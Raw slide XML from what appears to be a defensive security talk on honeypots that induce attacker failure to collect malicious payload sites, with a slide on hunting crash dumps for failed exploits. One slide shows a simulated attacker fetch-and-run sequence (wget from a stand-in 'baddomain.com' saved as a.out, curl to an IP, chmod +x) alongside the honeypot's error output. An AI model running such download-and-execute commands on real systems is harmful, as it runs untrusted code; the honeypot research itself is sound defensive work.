              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Inducing (Psychological) Failure… in Honeypots</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Content Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2F0C6F69-6BCC-FCDE-F286-32362CFE08A7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="595914" y="1463669"/>
            <a:ext cx="11239789" cy="1785104"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>We want to gather sites with malicious post-compromise payloads</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>We want to gather as many sites as possible</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>How can we use psychology to introduce failure? (aka building “Stumble Steps”)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="TextBox 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A01EBF70-234C-CA35-6AEF-33AD176E967F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="595914" y="4031381"/>
            <a:ext cx="10791825" cy="2308324"/>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a:t>
            </a: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wget</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baddomain.com/test.jpg –O </a:t>
            </a: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a.out</a:t>
            </a:r>
            <a:endPar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Resolving baddomain.com (baddomain.com)... failed: Name or service not known.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curl 174.53.15.95/test.jpg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curl: (22) The requested URL returned error: 403 Forbidden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curl newdomain.com/test.jpg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a:t>
            </a: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chmod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+x </a:t>
            </a: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a.out</a:t>
            </a:r>
            <a:endPar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801834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92C1-5E0D-CEC2-DAE2-37F1CF6D06BF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Move attackers to more favorable terrain</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{013D54E3-B1E9-6386-025C-DEC325DD82BA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="1825625"/>
            <a:ext cx="10515600" cy="435133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GB"/>
              <a:t>A lot of malware is uploaded in ZIP format</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-GB"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>ZIP spec doesn’t contain much machine specific metadata</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-GB"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>TAR does!</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="5" name="Group 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{414B8164-EE37-A0A0-4CB7-981312F0D1EC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="767960" y="1474820"/>
            <a:ext cx="11411903" cy="3032001"/>
            <a:chOff x="390047" y="3825999"/>
            <a:chExt cx="11411903" cy="3032001"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="6" name="Picture 5">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{98181CA1-3A76-6032-62AC-DC3C8CACDF72}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId2"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="390047" y="3825999"/>
              <a:ext cx="11411903" cy="3032001"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="7" name="Rectangle 6">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B5A20AED-2D43-91EA-6C79-F3588B0F6C5A}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8748889" y="3851910"/>
              <a:ext cx="2472268" cy="2788920"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln>
              <a:solidFill>
                <a:schemeClr val="accent1">
                  <a:shade val="50000"/>
                  <a:alpha val="2000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:ln>
            <a:effectLst>
              <a:glow rad="228600">
                <a:srgbClr val="0078D7">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510EC887-FAA4-3FDD-15EE-5C8DB3278288}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="161170" y="4714411"/>
            <a:ext cx="12018693" cy="1154268"/>
            <a:chOff x="173307" y="2373297"/>
            <a:chExt cx="12018693" cy="1154268"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="9" name="Picture 8">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5D96EFB4-6307-07ED-346F-F0563DE4149C}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId3"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="173307" y="2394066"/>
              <a:ext cx="12018693" cy="1133499"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="10" name="Rectangle 9">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AE2BD404-8A84-52A2-FEE0-A80F6EC0B76C}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8884867" y="2373297"/>
              <a:ext cx="3133826" cy="877903"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln>
              <a:solidFill>
                <a:schemeClr val="accent1">
                  <a:shade val="50000"/>
                  <a:alpha val="2000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:ln>
            <a:effectLst>
              <a:glow rad="228600">
                <a:srgbClr val="0078D7">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6B2704A3-10C4-93DB-B422-103836582ECE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1080252" y="4991516"/>
            <a:ext cx="10618469" cy="1754326"/>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92D050"/>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92D050"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>:~$ unzip malware.zip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bash: unzip: command not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92D050"/>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92D050"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>:~$ tar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tar: You must specify one of the `-</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-GB" sz="1800" b="1" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" err="1">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Acdtrux</a:t>
            </a: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 or `--test-label'  options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Try `tar --help' or `tar --usage' for more information.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="117121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1632937" y="3963564"/>
            <a:ext cx="9092883" cy="24179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36"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 51" descr="XP icon user accounts"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1834114" y="4091675"/>
            <a:ext cx="398501" cy="328661"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Rectangle 10"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5441069" y="1554340"/>
            <a:ext cx="2368861" cy="478376"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2448" dirty="0"/>
              <a:t>Watson Servers</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Rectangle 11"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1710655" y="4946562"/>
            <a:ext cx="3730413" cy="1118739"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2448" dirty="0"/>
              <a:t>Victim PC</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2040" dirty="0"/>
              <a:t>Agent built into Windows</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2040" dirty="0"/>
              <a:t> Victim sends crash report</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="2" name="Group 18"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="7694859" y="1398905"/>
            <a:ext cx="854886" cy="1010320"/>
            <a:chOff x="4857" y="1445"/>
            <a:chExt cx="756" cy="864"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="19" name="Picture 19" descr="Server"/>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId4" cstate="print"/>
            <a:srcRect/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4857" y="1445"/>
              <a:ext cx="454" cy="670"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
        </p:pic>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="3" name="Group 20"/>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm>
              <a:off x="5079" y="1639"/>
              <a:ext cx="534" cy="670"/>
              <a:chOff x="4888" y="1437"/>
              <a:chExt cx="534" cy="670"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="21" name="Picture 21" descr="Server"/>
              <p:cNvPicPr>
                <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
              </p:cNvPicPr>
              <p:nvPr/>
            </p:nvPicPr>
            <p:blipFill>
              <a:blip r:embed="rId4" cstate="print"/>
              <a:srcRect/>
              <a:stretch>
                <a:fillRect/>
              </a:stretch>
            </p:blipFill>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4888" y="1437"/>
                <a:ext cx="454" cy="670"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
            </p:spPr>
          </p:pic>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="22" name="Picture 22" descr="Database blue"/>
              <p:cNvPicPr>
                <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
              </p:cNvPicPr>
              <p:nvPr/>
            </p:nvPicPr>
            <p:blipFill>
              <a:blip r:embed="rId5" cstate="print"/>
              <a:srcRect/>
              <a:stretch>
                <a:fillRect/>
              </a:stretch>
            </p:blipFill>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5204" y="1800"/>
                <a:ext cx="218" cy="262"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
            </p:spPr>
          </p:pic>
        </p:grpSp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="4" name="Group 14"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="2222697" y="4169392"/>
            <a:ext cx="932603" cy="699453"/>
            <a:chOff x="2170" y="3308"/>
            <a:chExt cx="1060" cy="674"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="24" name="Picture 15" descr="Server"/>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId6" cstate="print"/>
            <a:srcRect/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr bwMode="auto">
            <a:xfrm flipH="1">
              <a:off x="2599" y="3308"/>
              <a:ext cx="327" cy="482"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="25" name="Picture 16" descr="laptop notebook portable Computer"/>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId7" cstate="print"/>
            <a:srcRect/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2780" y="3556"/>
              <a:ext cx="450" cy="426"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="26" name="Picture 17" descr="PC with flat panel"/>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId8" cstate="print"/>
            <a:srcRect/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2170" y="3433"/>
              <a:ext cx="533" cy="534"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
        </p:pic>
      </p:grpSp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="14" name="Picture 14" descr="3-01545_attack"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId9" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2766715" y="4175425"/>
            <a:ext cx="498278" cy="473990"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="31" name="Title 30"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1555221" y="280105"/>
            <a:ext cx="9326033" cy="885649"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Hunt Crash dumps to find Failed Exploits </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="5" name="Group 58"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="8860613" y="1010320"/>
            <a:ext cx="1865207" cy="1398905"/>
            <a:chOff x="6781800" y="4648200"/>
            <a:chExt cx="1828800" cy="1371600"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="52" name="Rectangle 51"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6781800" y="4953000"/>
              <a:ext cx="1828800" cy="106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36"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="53" name="Rectangle 52"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6781800" y="4648200"/>
              <a:ext cx="1275093" cy="34349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632" dirty="0"/>
                <a:t>iexplore.exe</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="2448" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="54" name="Picture 28" descr="bullet">
            <a:hlinkClick r:id="rId10"/>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId11"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="9715500" y="1554338"/>
            <a:ext cx="370775" cy="388585"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="55" name="Picture 28" descr="bullet">
            <a:hlinkClick r:id="rId10"/>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId11"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="10104084" y="1398904"/>
            <a:ext cx="370775" cy="388585"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="56" name="Picture 28" descr="bullet">
            <a:hlinkClick r:id="rId10"/>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId11"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="10104084" y="1787489"/>
            <a:ext cx="370775" cy="388585"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="58" name="Rectangle 57"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9171481" y="2409227"/>
            <a:ext cx="1554339" cy="958583"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1836" dirty="0"/>
              <a:t> exploit code</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1836" dirty="0"/>
              <a:t> hijacks</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="61" name="Picture 5" descr="C:\Users\johnla\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\TXAQIM4G\MPj03961210000[1].jpg"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId12" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="8938330" y="1398904"/>
            <a:ext cx="621736" cy="936261"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="62" name="Picture 2" descr="C:\Users\johnla\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\OIODY68J\MCj02932160000[1].wmf"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId13"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="9093766" y="1398904"/>
            <a:ext cx="471310" cy="466302"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:style>
          <a:lnRef idx="0">
            <a:scrgbClr r="0" g="0" b="0"/>
          </a:lnRef>
          <a:fillRef idx="1002">
            <a:schemeClr val="lt1"/>
          </a:fillRef>
          <a:effectRef idx="0">
            <a:scrgbClr r="0" g="0" b="0"/>
          </a:effectRef>
          <a:fontRef idx="major"/>
        </p:style>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="66" name="Bent Arrow 65"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="16200000" flipV="1">
            <a:off x="4935908" y="971461"/>
            <a:ext cx="2331508" cy="5362469"/>
          </a:xfrm>
          <a:prstGeom prst="bentArrow">
            <a:avLst>
              <a:gd name="adj1" fmla="val 25000"/>
              <a:gd name="adj2" fmla="val 18478"/>
              <a:gd name="adj3" fmla="val 22878"/>
              <a:gd name="adj4" fmla="val 43750"/>
            </a:avLst>
          </a:prstGeom>
        </p:spPr>
        <p:style>
          <a:lnRef idx="1">
            <a:schemeClr val="accent1"/>
          </a:lnRef>
          <a:fillRef idx="1001">
            <a:schemeClr val="lt2"/>
          </a:fillRef>
          <a:effectRef idx="1">
            <a:schemeClr val="accent1"/>
          </a:effectRef>
          <a:fontRef idx="minor">
            <a:schemeClr val="dk1"/>
          </a:fontRef>
        </p:style>
        <p:txBody>
          <a:bodyPr rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:endParaRPr lang="en-US" sz="1836"/>
